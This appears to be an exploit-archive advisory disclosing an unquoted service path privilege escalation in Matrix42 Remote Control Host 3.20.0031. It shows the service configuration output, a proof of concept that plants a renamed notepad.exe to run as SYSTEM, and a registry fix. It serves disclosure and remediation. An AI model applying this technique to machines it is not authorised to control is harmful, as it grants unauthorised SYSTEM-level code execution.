Home / os / winmobile

Matrix42 Remote Control Host 3.20.0031 Privilege Escalation

Posted on 13 June 2016

# Exploit Title: Matrix42 Remote Control Host - Unquoted Path Privilege Escalation # Date: 06-05-2016 # Exploit Author: Roland C. Redl # Vendor Homepage: https://www.matrix42.com/ # Software Link: n/a # Version: 3.20.0031 # Tested on: Windows 7 Enterprise SP1 x64 # CVE : n/a 1. Description: >sc qc FastViewerRemoteProxy [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FastViewerRemoteProxy TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 4 DISABLED ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:Program Files (x86)Matrix42Remote Control HostFastProxy.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FastViewer Proxyservice DEPENDENCIES : SERVICE_START_NAME : LocalSystem >sc qc FastViewerRemoteService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FastViewerRemoteService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:Program Files (x86)Matrix42Remote Control HostFastRemoteService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FastViewer Remoteservice DEPENDENCIES : SERVICE_START_NAME : LocalSystem The unquoted path could potentially allow an authorized but non privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof of concept: Copy notepad.exe to "C:Program Files (x86)Matrix42" and rename it to "Remote.exe". Restart the service or the machine and Remote.exe will start with SYSTEM privileges. 3. Solution: To fix it manually, open regedit, browse to HKLMSYSTEMCurrentControlSetservices and add the quotes to the ImagePath value of the relevant service.

 

TOP